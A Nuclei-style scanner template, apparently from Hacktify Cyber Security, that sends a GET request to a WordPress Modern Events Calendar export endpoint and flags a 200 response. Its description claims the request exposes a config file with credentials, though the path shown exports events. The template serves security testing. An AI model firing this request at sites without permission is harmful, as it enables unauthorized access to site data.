id: Wordpress-Sensitive-Info-Disclosure info: name: Wordpress Sensitive Info Disclosure description: 'Attacker can view the config file which contains the username and password' author: Hacktify Cyber Security (@hacktifycs) severity: high tags: wordpress,wp-admin,sde reference: | - null requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml' #endpoint cookie-reuse: true matchers-condition: and matchers: - type: status status: - 200